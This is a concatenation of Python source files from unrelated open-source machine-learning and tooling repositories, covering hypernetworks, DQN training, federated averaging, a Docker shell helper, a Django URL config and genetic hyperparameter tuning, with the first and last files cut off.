def __init__(self):
self.search = []
self.all = False
self.slim = False
self.include = False
self.order = False
self.reverse = False
self.json = False
self.version = False
|
physics_aware_training/model_architectures/SplitInputParameterNet.py
|
mcmahon-lab/Physics-Aware-Training
| 182 |
64240
|
import torch
import torch.nn as nn
import physics_aware_training.digital_twin_utils
class SplitInputParameterNet(nn.Module):
def __init__(self,
input_dim,
nparams,
output_dim,
parameterNunits = [100,100,100],
internalNunits = [10,10,10]):
'''
Defines a network that splits inputs x into physical system inputs and parameters.
Inputs are propagated through a "main" neural network whose weights are predicted by an
auxiliary neural network that takes the parameters as input.
Args:
    input_dim (int): dimension of physical system inputs
    nparams (int): combined dimension of all physical system parameters
    output_dim (int): dimension of physical system outputs
    parameterNunits (list of int): number of hidden units per layer of the
        auxiliary parameter network
    internalNunits (list of int): number of hidden units per layer of the main
        network that propagates physical system inputs
'''
super(SplitInputParameterNet, self).__init__()
self.input_dim = input_dim
self.nparams = nparams
self.output_dim = output_dim
self.internalNunits = internalNunits
self.inputNlayers = len(internalNunits)
nparameters = 0
for i in range(len(internalNunits)-1):
nparameters += internalNunits[i]*internalNunits[i+1]
nparameters += internalNunits[i+1]
# parameterNet is a submodel that predicts a matrix of dimensions
self.parameterNet = torch.nn.Sequential()
self.parameterNet.add_module("fcIn", torch.nn.Linear(nparams, parameterNunits[0]))
for i in range(len(parameterNunits)):
if i<len(parameterNunits)-1:
self.parameterNet.add_module(f"relu{i}", torch.nn.ReLU())
self.parameterNet.add_module(f"fc{i}", torch.nn.Linear(parameterNunits[i], parameterNunits[i+1]))
else:
self.parameterNet.add_module(f"relu{i}", torch.nn.ReLU())
self.parameterNet.add_module(f"fcOut", torch.nn.Linear(parameterNunits[i], nparameters))
# two fully connected input and output layers adjust the input and output dimension to
# the internal dimension
self.fcIn = nn.Linear(input_dim, internalNunits[0])
self.fcOut = nn.Linear(internalNunits[-1], output_dim)
def forward(self, x):
batch_size, _ = x.shape
# initialize matrices for inputNet
inputNetMatrices = []
inputNetBiases = []
for i in range(len(self.internalNunits)-1):
inputNetMatrices.append([torch.zeros(batch_size, self.internalNunits[i], self.internalNunits[i+1])])
inputNetBiases.append([torch.zeros(batch_size, self.internalNunits[i+1], 1)])
# split x into physical system inputs and parameters
inputs = x[:, :self.input_dim]
parameters = x[:, self.input_dim:]
# AUXILIARY PARAMETER NETWORK
parameters = self.parameterNet(parameters)
# fill inputNetMatrices with outputs from parameterNet
index = 0
for i in range(len(self.internalNunits)-1):
index_temp = index
index += self.internalNunits[i] * self.internalNunits[i+1]
inputNetMatrices[i] = parameters[:, index_temp:index].reshape(batch_size, self.internalNunits[i+1], self.internalNunits[i])
# fill inputNetBiases with outputs from parameterNet
for i in range(len(self.internalNunits)-1):
index_temp = index
index += self.internalNunits[i+1]
inputNetBiases[i] = parameters[:, index_temp:index].reshape(batch_size, self.internalNunits[i+1], 1)
# MAIN INPUT NETWORK
inputs = self.fcIn(inputs).unsqueeze(-1)
# MAIN INPUT NETWORK
for i in range(len(self.internalNunits)-1):
# apply matrices and biases just filled with outputs from parameterNet
inputs = torch.bmm(inputNetMatrices[i], inputs)
inputs += inputNetBiases[i]
inputs = torch.relu(inputs)
return self.fcOut(inputs.squeeze(-1))
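# Illustrative smoke test (a sketch, not part of the original module): build a small
# SplitInputParameterNet and push a random batch through it. Shapes follow forward()
# above, where x concatenates physical inputs and parameters along dim 1.
def _example_forward_pass():
    input_dim, nparams, output_dim = 4, 3, 2
    model = SplitInputParameterNet(input_dim, nparams, output_dim,
                                   parameterNunits=[64, 64],
                                   internalNunits=[10, 10, 10])
    x = torch.randn(8, input_dim + nparams)  # batch of 8 samples
    return model(x).shape  # expected: torch.Size([8, 2])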
class SplitInputParameterObjective(object):
# define class to smuggle additional arguments into objective function
def __init__(self, train_loader, test_loader, dt_path, input_dim, nparams, output_dim, **modelargs):
self.modelargs = modelargs
self.dt_path = dt_path
self.train_loader = train_loader
self.test_loader = test_loader
self.input_dim = input_dim
self.nparams = nparams
self.output_dim = output_dim
def __call__(self, trial):
lr = trial.suggest_loguniform("lr", 1e-4, 1e-1)
parameterNlayers = trial.suggest_categorical("parameterNlayers", [1, 2, 3, 4, 5])
parameterNunits = []
if parameterNlayers == 1:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
if parameterNlayers == 2:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
if parameterNlayers == 3:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
if parameterNlayers == 4:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
if parameterNlayers == 5:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits5", 50, 1000)))
internalNlayers = trial.suggest_categorical("internalNlayers", [1, 2, 3, 4, 5])
internalNunits = []
if internalNlayers == 1:
    internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
if internalNlayers == 2:
    internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
if internalNlayers == 3:
    internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
if internalNlayers == 4:
    internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits4", 10, 100)))
if internalNlayers == 5:
    internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits4", 10, 100)))
    internalNunits.append(int(trial.suggest_loguniform("iNunits5", 10, 100)))
name = f"{self.dt_path}_v{trial.number}" #create name with trial index
value, model_path = physics_aware_training.digital_twin_utils.train_loop_reg_model(
self.train_loader,
self.test_loader,
name,
self.input_dim,
self.nparams,
self.output_dim,
Model = SplitInputParameterNet,
parameterNunits = parameterNunits,
internalNunits = internalNunits,
lr = lr,
**self.modelargs)
trial.set_user_attr('model_path', model_path) #save the model path string in NAS study
return value
|
dusty/commands/shell.py
|
gamechanger/dusty
| 421 |
64245
|
<reponame>gamechanger/dusty
from ..compiler.spec_assembler import get_specs
from . import utils
from ..systems.docker import get_dusty_container_name
def execute_shell(app_or_service_name):
specs = get_specs()
if app_or_service_name not in [spec.name for spec in specs.get_apps_and_services()]:
raise KeyError('No app or service found named {}'.format(app_or_service_name))
exec_options = utils.exec_docker_options()
utils.exec_docker('exec', exec_options, get_dusty_container_name(app_or_service_name), '/bin/bash')
|
Chapter08/07_dqn_distrib.py
|
haohaoxiao/Deep-Reinforcement-Learning-Hands-On-Second-Edition
| 621 |
64258
|
#!/usr/bin/env python3
import gym
import ptan
import argparse
import random
import numpy as np
import torch
import torch.optim as optim
import torch.nn.functional as F
from ignite.engine import Engine
from lib import common, dqn_extra
NAME = "07_distrib"
def calc_loss(batch, net, tgt_net, gamma, device="cpu"):
states, actions, rewards, dones, next_states = \
common.unpack_batch(batch)
batch_size = len(batch)
states_v = torch.tensor(states).to(device)
actions_v = torch.tensor(actions).to(device)
next_states_v = torch.tensor(next_states).to(device)
# next state distribution
next_distr_v, next_qvals_v = tgt_net.both(next_states_v)
next_acts = next_qvals_v.max(1)[1].data.cpu().numpy()
next_distr = tgt_net.apply_softmax(next_distr_v)
next_distr = next_distr.data.cpu().numpy()
next_best_distr = next_distr[range(batch_size), next_acts]
dones = dones.astype(bool)
proj_distr = dqn_extra.distr_projection(
next_best_distr, rewards, dones, gamma)
distr_v = net(states_v)
sa_vals = distr_v[range(batch_size), actions_v.data]
state_log_sm_v = F.log_softmax(sa_vals, dim=1)
proj_distr_v = torch.tensor(proj_distr).to(device)
loss_v = -state_log_sm_v * proj_distr_v
return loss_v.sum(dim=1).mean()
if __name__ == "__main__":
random.seed(common.SEED)
torch.manual_seed(common.SEED)
params = common.HYPERPARAMS['pong']
parser = argparse.ArgumentParser()
parser.add_argument("--cuda", default=False, action="store_true", help="Enable cuda")
args = parser.parse_args()
device = torch.device("cuda" if args.cuda else "cpu")
env = gym.make(params.env_name)
env = ptan.common.wrappers.wrap_dqn(env)
env.seed(common.SEED)
net = dqn_extra.DistributionalDQN(env.observation_space.shape, env.action_space.n).to(device)
print(net)
tgt_net = ptan.agent.TargetNet(net)
selector = ptan.actions.EpsilonGreedyActionSelector(epsilon=params.epsilon_start)
epsilon_tracker = common.EpsilonTracker(selector, params)
agent = ptan.agent.DQNAgent(lambda x: net.qvals(x), selector, device=device)
exp_source = ptan.experience.ExperienceSourceFirstLast(
env, agent, gamma=params.gamma)
buffer = ptan.experience.ExperienceReplayBuffer(
exp_source, buffer_size=params.replay_size)
optimizer = optim.Adam(net.parameters(), lr=params.learning_rate)
def process_batch(engine, batch):
optimizer.zero_grad()
loss_v = calc_loss(batch, net, tgt_net.target_model,
gamma=params.gamma, device=device)
loss_v.backward()
optimizer.step()
epsilon_tracker.frame(engine.state.iteration)
if engine.state.iteration % params.target_net_sync == 0:
tgt_net.sync()
return {
"loss": loss_v.item(),
"epsilon": selector.epsilon,
}
engine = Engine(process_batch)
common.setup_ignite(engine, params, exp_source, NAME)
engine.run(common.batch_generator(buffer, params.replay_initial, params.batch_size))
|
library/test/test_compiler/sbs_code_tests/06_funcall_varargs_kwargs.py
|
creativemindplus/skybison
| 278 |
64297
|
<gh_stars>100-1000
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
c = (a, b)
d = {e: 1, f: 2}
fun(a, b, *c, **d)
# EXPECTED:
[
...,
BUILD_TUPLE(2),
...,
BUILD_TUPLE_UNPACK_WITH_CALL(2),
...,
CALL_FUNCTION_EX(1),
...,
]
|
tests/urls.py
|
sergioisidoro/django-robots
| 252 |
64299
|
<reponame>sergioisidoro/django-robots<gh_stars>100-1000
import django.contrib.sitemaps.views
import django.views.i18n
import django.views.static
from django.conf import settings
from django.contrib import admin
from django.contrib.sitemaps.views import sitemap as sitemap_view
from django.urls import include
from django.urls import re_path as url
from django.views.decorators.cache import cache_page
urlpatterns = [
url(
r"^media/(?P<path>.*)$",
django.views.static.serve, # NOQA
{"document_root": settings.MEDIA_ROOT, "show_indexes": True},
),
url(r"^admin/", admin.site.urls), # NOQA
url(r"^/", include("robots.urls")), # NOQA
url(r"^sitemap.xml$", sitemap_view, {"sitemaps": []}),
url(
r"^other/sitemap.xml$",
cache_page(60)(sitemap_view),
{"sitemaps": []},
name="cached-sitemap",
),
]
|
acoustics/aio.py
|
cnheider/python-acoustics
| 371 |
64303
|
"""
Cirrus
======
Handle Cirrus data.
"""
import csv
import io
import re
import pandas as pd
def read_csv_cirrus(filename): # pylint: disable=too-many-locals
"""Read a Cirrus CSV file. Currently exists support for some types of
CSV files extracted with NoiseTools. There is no support for CSVs related
with occupational noise.
If there are NC and NR values in the csv file, they will be stored in the
returned object with attributes ``nc`` and ``nr``. If the CSV file contains
time history, you can access to date and time with the ``time`` attribute.
Also, it is possible to know the integration time with the
``integration_time`` attribute.
:param filename: CSV file name.
:returns: Pandas dataframe with all data extracted from the CSV file.
:rtype: Pandas dataframe.
"""
with open(filename, "r") as csvfile:
csvreader = csvfile.read()
csvreader = re.sub(r" dB", "", csvreader) # Clean " dB" from data
dialect = csv.Sniffer().sniff(csvreader, delimiters=",;")
separator = dialect.delimiter
# Guess decimal separator
decimal_sep = re.search(
r"\"\d{2,3}"
r"(\.|,)" # Decimal separator
r"\d{1,2}\"",
csvreader,
).group(1)
n_cols = re.search("(.+)\n", csvreader).group(1).count(separator) + 1
if n_cols < 5:
unsorted_data = []
pdindex = ["Z"]
for i, c in enumerate(csvreader.splitlines()):
if c[:4] == '"NR"':
nr = int(re.search(r"\d{2}", c).group(0))
continue
elif c[:4] == '"NC"':
nc = int(re.search(r"\d{2}", c).group(0))
continue
if i != 0:
unsorted_data.append(c.split(separator))
else:
if n_cols == 3:
pdindex.append(c[-2:-1])
elif n_cols == 4:
pdindex.append("A")
pdindex.append("C")
# Create a sorted temporary csv-like file
csv_data = list(zip(*unsorted_data))
temp_csv = ""
for row in csv_data:
temp_csv += separator.join(row) + "\n"
# Then, read it with pandas
data = pd.read_csv(
io.StringIO(temp_csv),
sep=separator,
decimal=decimal_sep,
)
# Assign NC and NR data if they are present
try:
data.nc = nc
data.nr = nr
# TODO specify exception type:
except: # pylint: disable=bare-except
pass
# If the csv file contains global data from the "Details" tab in
# NoiseTools, skip row names
if n_cols != 2:
data.index = pdindex
else:
data = pd.read_csv(
filename,
parse_dates=[[0, 1]],
sep=separator,
decimal=decimal_sep,
)
# Fix time name column
en_columns = data.columns.values
en_columns[0] = "time"
data.columns = en_columns
# Guess integration time with statistical mode because the csv could
# have been cleaned from unwanted noise
data["time"] = pd.to_datetime(data.time)
delta = data.time.diff().fillna(0.0)
# Mode and change from ns to s
int_time = int(delta.mode().astype(int) * 1e-9)
if round(int_time, 2) == 0.06: # Fix for 1/16 s
int_time = 0.0625
data.integration_time = int_time
return data
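# Illustrative usage (a sketch; "measurement.csv" is a hypothetical NoiseTools export):
#   data = read_csv_cirrus("measurement.csv")
#   print(data.head())
#   print(getattr(data, "integration_time", None))  # only set for time-history files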
|
tensorflow_federated/python/examples/stateful_clients/stateful_fedavg_tf.py
|
zhihansh/federated-oss
| 1,918 |
64328
|
<reponame>zhihansh/federated-oss
# Copyright 2020, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An implementation of the FedAvg algorithm with stateful clients.
The TF functions for server and client updates.
"""
import collections
from typing import Union
import attr
import tensorflow as tf
import tensorflow_federated as tff
ModelWeights = collections.namedtuple('ModelWeights', 'trainable non_trainable')
ModelOutputs = collections.namedtuple('ModelOutputs', 'loss')
def get_model_weights(
model: Union[tff.learning.Model, 'KerasModelWrapper']
) -> Union[tff.learning.ModelWeights, ModelWeights]:
"""Gets the appropriate ModelWeights object based on the model type."""
if isinstance(model, tff.learning.Model):
return tff.learning.ModelWeights.from_model(model)
else:
# Using simple_fedavg custom Keras wrapper.
return model.weights
class KerasModelWrapper(object):
"""A standalone keras wrapper to be used in TFF."""
def __init__(self, keras_model, input_spec, loss):
"""A wrapper class that provides necessary API handles for TFF.
Args:
keras_model: A `tf.keras.Model` to be trained.
input_spec: Metadata of the dataset that describes the input tensors, which
will be converted to `tff.Type` specifying the expected type of input
and output of the model.
loss: A `tf.keras.losses.Loss` instance to be used for training.
"""
self.keras_model = keras_model
self.input_spec = input_spec
self.loss = loss
def forward_pass(self, batch_input, training=True):
"""Forward pass of the model to get loss for a batch of data.
Args:
batch_input: A `collections.abc.Mapping` with two keys, `x` for inputs and
`y` for labels.
training: Boolean scalar indicating training or inference mode.
Returns:
A scalar tf.float32 `tf.Tensor` loss for current batch input.
"""
preds = self.keras_model(batch_input['x'], training=training)
loss = self.loss(batch_input['y'], preds)
return ModelOutputs(loss=loss)
@property
def weights(self):
return ModelWeights(
trainable=self.keras_model.trainable_variables,
non_trainable=self.keras_model.non_trainable_variables)
def from_weights(self, model_weights):
tf.nest.map_structure(lambda v, t: v.assign(t),
self.keras_model.trainable_variables,
list(model_weights.trainable))
tf.nest.map_structure(lambda v, t: v.assign(t),
self.keras_model.non_trainable_variables,
list(model_weights.non_trainable))
def keras_evaluate(model, test_data, metric):
metric.reset_states()
for batch in test_data:
preds = model(batch['x'], training=False)
metric.update_state(y_true=batch['y'], y_pred=preds)
return metric.result()
@attr.s(eq=False, frozen=True, slots=True)
class ClientState(object):
"""Structure for state on the client.
Fields:
- `client_index`: The client index integer to map the client state back to
the database hosting client states in the driver file.
- `iters_count`: The number of total iterations a client has computed in
the total rounds so far.
"""
client_index = attr.ib()
iters_count = attr.ib()
@attr.s(eq=False, frozen=True, slots=True)
class ClientOutput(object):
"""Structure for outputs returned from clients during federated optimization.
Fields:
- `weights_delta`: A dictionary of updates to the model's trainable
variables.
- `client_weight`: Weight to be used in a weighted mean when
aggregating `weights_delta`.
- `model_output`: A structure matching
`tff.learning.Model.report_local_outputs`, reflecting the results of
training on the input dataset.
- `client_state`: The updated `ClientState`.
"""
weights_delta = attr.ib()
client_weight = attr.ib()
model_output = attr.ib()
client_state = attr.ib()
@attr.s(eq=False, frozen=True, slots=True)
class ServerState(object):
"""Structure for state on the server.
Fields:
- `model_weights`: A dictionary of model's trainable variables.
- `optimizer_state`: Variables of optimizer.
- 'round_num': Current round index
- `total_iters_count`: The total number of iterations run on seen clients
"""
model_weights = attr.ib()
optimizer_state = attr.ib()
round_num = attr.ib()
total_iters_count = attr.ib()
@attr.s(eq=False, frozen=True, slots=True)
class BroadcastMessage(object):
"""Structure for tensors broadcasted by server during federated optimization.
Fields:
- `model_weights`: A dictionary of model's trainable tensors.
- `round_num`: Round index to broadcast. We use `round_num` as an example to
show how to broadcast auxiliary information that can be helpful on
clients. It is not explicitly used, but can be applied to enable
learning rate scheduling.
"""
model_weights = attr.ib()
round_num = attr.ib()
@tf.function
def server_update(model, server_optimizer, server_state, weights_delta,
total_iters_count):
"""Updates `server_state` based on `weights_delta`.
Args:
model: A `KerasModelWrapper` or `tff.learning.Model`.
server_optimizer: A `tf.keras.optimizers.Optimizer`. If the optimizer
creates variables, they must have already been created.
server_state: A `ServerState`, the state to be updated.
weights_delta: A nested structure of tensors holding the updates to the
trainable variables of the model.
total_iters_count: A scalar to update `ServerState.total_iters_count`.
Returns:
An updated `ServerState`.
"""
# Initialize the model with the current state.
model_weights = get_model_weights(model)
tf.nest.map_structure(lambda v, t: v.assign(t), model_weights,
server_state.model_weights)
tf.nest.map_structure(lambda v, t: v.assign(t), server_optimizer.variables(),
server_state.optimizer_state)
# Apply the update to the model.
neg_weights_delta = [-1.0 * x for x in weights_delta]
server_optimizer.apply_gradients(
zip(neg_weights_delta, model_weights.trainable), name='server_update')
# Create a new state based on the updated model.
return tff.structure.update_struct(
server_state,
model_weights=model_weights,
optimizer_state=server_optimizer.variables(),
round_num=server_state.round_num + 1,
total_iters_count=total_iters_count)
@tf.function
def build_server_broadcast_message(server_state):
"""Build `BroadcastMessage` for broadcasting.
This method can be used to post-process `ServerState` before broadcasting.
For example, perform model compression on `ServerState` to obtain a compressed
state that is sent in a `BroadcastMessage`.
Args:
server_state: A `ServerState`.
Returns:
A `BroadcastMessage`.
"""
return BroadcastMessage(
model_weights=server_state.model_weights,
round_num=server_state.round_num)
@tf.function
def client_update(model, dataset, client_state, server_message,
client_optimizer):
"""Performans client local training of `model` on `dataset`.
Args:
model: A `tff.learning.Model`.
dataset: A 'tf.data.Dataset'.
client_state: A 'ClientState'.
server_message: A `BroadcastMessage` from server.
client_optimizer: A `tf.keras.optimizers.Optimizer`.
Returns:
A 'ClientOutput`.
"""
model_weights = get_model_weights(model)
initial_weights = server_message.model_weights
tf.nest.map_structure(lambda v, t: v.assign(t), model_weights,
initial_weights)
num_examples = tf.constant(0, dtype=tf.int32)
loss_sum = tf.constant(0, dtype=tf.float32)
iters_count = tf.convert_to_tensor(client_state.iters_count)
for batch in dataset:
with tf.GradientTape() as tape:
outputs = model.forward_pass(batch)
grads = tape.gradient(outputs.loss, model_weights.trainable)
client_optimizer.apply_gradients(zip(grads, model_weights.trainable))
batch_size = (tf.shape(batch['x'])[0])
num_examples += batch_size
loss_sum += outputs.loss * tf.cast(batch_size, tf.float32)
iters_count += 1
weights_delta = tf.nest.map_structure(lambda a, b: a - b,
model_weights.trainable,
initial_weights.trainable)
client_weight = tf.cast(num_examples, tf.float32)
return ClientOutput(
weights_delta, client_weight, loss_sum / client_weight,
ClientState(
client_index=client_state.client_index, iters_count=iters_count))
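# Illustrative sketch (not part of the original module): wrapping a toy Keras model
# so it can be used with the helpers above. The 784-feature input spec, the model
# architecture and the loss are arbitrary assumptions for the example.
def _example_keras_wrapper():
    keras_model = tf.keras.Sequential([
        tf.keras.layers.InputLayer(input_shape=(784,)),
        tf.keras.layers.Dense(10),
    ])
    input_spec = collections.OrderedDict(
        x=tf.TensorSpec(shape=[None, 784], dtype=tf.float32),
        y=tf.TensorSpec(shape=[None], dtype=tf.int32))
    loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
    wrapped = KerasModelWrapper(keras_model, input_spec, loss)
    return get_model_weights(wrapped)  # -> ModelWeights(trainable=..., non_trainable=...)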
|
colossalai/engine/schedule/_non_pipeline_schedule.py
|
RichardoLuo/ColossalAI
| 1,630 |
64337
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from typing import Iterable
import torch
from ._base_schedule import BaseSchedule
from colossalai.utils import conditional_context
class NonPipelineSchedule(BaseSchedule):
"""A helper schedule class for no pipeline parallelism running environment.
During one process, it loads a batch of dataset and feeds it to the model.
After getting the output and calculating the loss, it will use :meth:`step`
to update the parameters if it is in training mode.
Args:
batch_data_process_func (Callable, optional): The preprocessing function which receives a batch of data,
and it will be executed in load_batch.
"""
def forward_backward_step(self,
engine,
data_iter: Iterable,
forward_only: bool = False,
return_loss: bool = True,
return_output_label: bool = True):
"""The process function that loads a batch of dataset and feeds it to the model.
The returned labels and loss will be None if :attr:`return_loss` is False.
Args:
engine (colossalai.engine.Engine): Colossalai engine for training and inference.
data_iter (Iterable): Dataloader as the form of an iterator, obtained by calling iter(dataloader).
forward_only (bool, optional):
If True, the model is run for the forward pass, else back propagation will be executed.
return_loss (bool, optional): Loss will be returned if True.
return_output_label (bool, optional): Output and label will be returned if True.
Returns:
Tuple[:class:`torch.Tensor`]: A tuple of (output, label, loss), loss and label could be None.
"""
assert forward_only or return_loss, \
"The argument 'return_loss' has to be True when 'forward_only' is False, but got False."
data, label = self.load_batch(data_iter)
# forward
with conditional_context(torch.no_grad(), enable=forward_only):
output = self._call_engine(engine, data)
if return_loss:
loss = self._call_engine_criterion(engine, output, label)
if not forward_only:
engine.backward(loss)
if return_output_label:
if return_loss:
return output, label, loss
else:
return output, label, None
else:
if return_loss:
return None, None, loss
else:
return None, None, None
|
examples/genetic_rl.py
|
matrig/genrl
| 390 |
64349
|
<reponame>matrig/genrl<filename>examples/genetic_rl.py<gh_stars>100-1000
import argparse
from genrl import A2C, PPO1
from genrl.deep.common import OnPolicyTrainer
from genrl.deep.common.actor_critic import MlpActorCritic
from genrl.deep.common.utils import get_env_properties
from genrl.environments import VectorEnv
from genrl.evolutionary import GeneticHyperparamTuner
# """
# Okay so parameters to tune:-
# - layers
# - lr_policy
# - lr_value
# - clip param
# - entropy coeff
# - value coeff
# - gamma
# """
def get_logger(log):
if "," not in log:
return [log]
else:
log = log.split(",")
if "" in log or " " in log:
log = [i for i in log if i != ""]
log = [i for i in log if i != " "]
return log
# Code inspired from https://github.com/harvitronix/neural-network-genetic-algorithm
class GATuner(GeneticHyperparamTuner):
def fitness(self, agent):
"""
Return the mean rewards, which is our fitness function
"""
return agent.get_logging_params()["mean_reward"]
def train_population(agents, envirnment, args):
"""
Train all the agents in the population
Args:
agents (List): List of agents
envirnment: Gym environment
"""
logger = get_logger(args.log)
for agent in agents:
trainer = OnPolicyTrainer(
agent,
envirnment,
logger,
epochs=args.epochs,
render=args.render,
log_interval=args.log_interval,
)
trainer.train()
del trainer
print("-" * 80)
def generate(
generations, no_of_parents, agent_parameter_choices, envirnment, generic_agent, args
):
"""
Genetic Algorithm for RL
Args:
        generations (int): No. of generations
        no_of_parents (int): No. of agents in a generation
        agent_parameter_choices (Dict): Parameter choices for the agent
        envirnment: Gym environment
        generic_agent: RL agent to be tuned
"""
optimizer = GATuner(agent_parameter_choices)
agents = optimizer.initialize_population(no_of_parents, generic_agent)
# evolve the generation
for i in range(generations):
print(f"Doing generation {i}/{generations}")
# Train the agents
train_population(agents, envirnment, args)
# get average fitness of the generation
avg_reward = optimizer.grade(agents)
print(f"Generation avg reward:{avg_reward}")
print("-" * 50)
# Evolve the generation
if i != generations - 1:
agents = optimizer.evolve(agents)
# sort our final population
agents = sorted(agents, key=lambda x: optimizer.fitness(x), reverse=True)
# print rewards of top 5
for i in range(5):
print(f"Top {i+1} agent reward: {optimizer.fitness(agents[i])}")
def main(args):
env = VectorEnv(
args.env, n_envs=args.n_envs, parallel=not args.serial, env_type=args.env_type
)
input_dim, action_dim, discrete, action_lim = get_env_properties(env, "mlp")
network = MlpActorCritic(
input_dim,
action_dim,
(1, 1), # layers
(1, 1),
"V", # type of value function
discrete,
action_lim=action_lim,
activation="relu",
)
generic_agent = A2C(network, env, rollout_size=args.rollout_size)
agent_parameter_choices = {
"gamma": [12, 121],
# 'clip_param': [0.2, 0.3],
# 'lr_policy': [0.001, 0.002],
# 'lr_value': [0.001, 0.002]
}
generate(
args.generations,
args.population,
agent_parameter_choices,
env,
generic_agent,
args,
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Train Deep RL algorithms")
# parser.add_argument("-a", "--algo", help="Which Algo to train", default="ppo", type=str)
parser.add_argument(
"-e", "--env", help="Which env to train on", default="CartPole-v0", type=str
)
parser.add_argument(
"--env-type", help="What kind of env is it", default="gym", type=str
)
parser.add_argument(
"-n",
"--n-envs",
help="Number of vectorized envs to train on",
default=2,
type=int,
)
parser.add_argument(
"--serial",
help="Vectorized envs should be serial or parallel",
default=True,
type=bool,
)
parser.add_argument(
"--epochs", help="How many epochs to train on", default=20, type=int
)
parser.add_argument(
"--render",
help="Should the env be rendered",
default=False,
action="store_true",
)
parser.add_argument(
"--log", help="Comma separated string of logs", default="stdout", type=str
)
parser.add_argument(
"--arch", help="Which architecture mlp/cnn for now", default="mlp", type=str
)
parser.add_argument("--log-interval", help="Set Log interval", default=50, type=int)
parser.add_argument("--batch-size", help="Batch Size", default=128, type=int)
parser.add_argument(
"--population", help="No. of agents in a generation", default=10, type=int
)
parser.add_argument("--generations", help="No. of generations", default=5, type=int)
offpolicyargs = parser.add_argument_group("Off Policy Args")
offpolicyargs.add_argument(
"-ws", "--warmup-steps", help="Warmup steps", default=10000, type=int
)
offpolicyargs.add_argument(
"--replay-size", help="Replay Buffer Size", default=1000, type=int
)
onpolicyargs = parser.add_argument_group("On Policy Args")
onpolicyargs.add_argument(
"--rollout-size", help="Rollout Buffer Size", default=2048, type=int
)
args = parser.parse_args()
main(args)
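# Example invocation (illustrative; the flags are defined in the parser above, the values are arbitrary):
#   python examples/genetic_rl.py --env CartPole-v0 --population 10 --generations 5 --epochs 20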
|
examples/genetic_alg/simple_gen.py
|
AravindaDP/gym-donkeycar
| 106 |
64354
|
"""
file: simple_gen.py
author: <NAME>
date: 17 May 2020
notes: a basic implementation of genetic cross-breeding and mutation that attempts to improve
a neural network. Assumes the standard Keras model from the Donkeycar project.
A lower score means lower loss, i.e. a better agent.
"""
import argparse
import json
import os
import time
import warnings
import numpy as np
from PIL import Image
# noisy, noisy tensorflow. we love you.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=FutureWarning)
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
class IAgent:
def begin(self):
pass
def wait(self):
pass
def get_score(self):
pass
def make_new(self, parent1, parent2):
return IAgent()
class GeneticAlg:
def __init__(self, population, conf={}):
self.population = population
self.conf = conf
def finished(self):
return False
def process(self, num_iter):
iIter = 0
while not self.finished() and iIter < num_iter:
print("starting epoch", iIter)
s = time.time()
self.evaluate_agents()
self.on_agents_finished()
e = time.time() - s
self.breed_agents()
iIter += 1
d = time.time() - s
# Time per iteration getting worse?!
print("finish epoch", iIter)
print("Iter %d eval time: %f total time: %f" % (iIter, e, d))
def on_agents_finished(self):
pass
def evaluate_agents(self):
for agent in self.population:
agent.begin()
for agent in self.population:
agent.wait()
self.sort_agents()
# progress
print("scores:", [a.score for a in self.population])
def how_many_to_keep(self):
return round(len(self.population) / 4) + 1
def breed_agents(self):
"""
        Keep the best N agents of our population and replace the rest
        with new agents cross-bred from the survivors.
"""
keep = self.how_many_to_keep()
num_new = len(self.population) - keep
pop_to_keep = self.population[0:keep]
new_population = []
for _ in range(num_new):
p1, p2 = self.select_parents()
new_agent = p1.make_new(p1, p2)
new_agent.mutate()
new_population.append(new_agent)
self.population = pop_to_keep + new_population
def sort_agents(self):
self.population.sort(key=lambda x: x.get_score(), reverse=False)
def select_pop_index(self):
r = np.random.uniform(low=0.0, high=1.0)
N = len(self.population)
iP = round(r * N) % N
return iP
def select_parents(self):
iP1 = self.select_pop_index()
iP2 = self.select_pop_index()
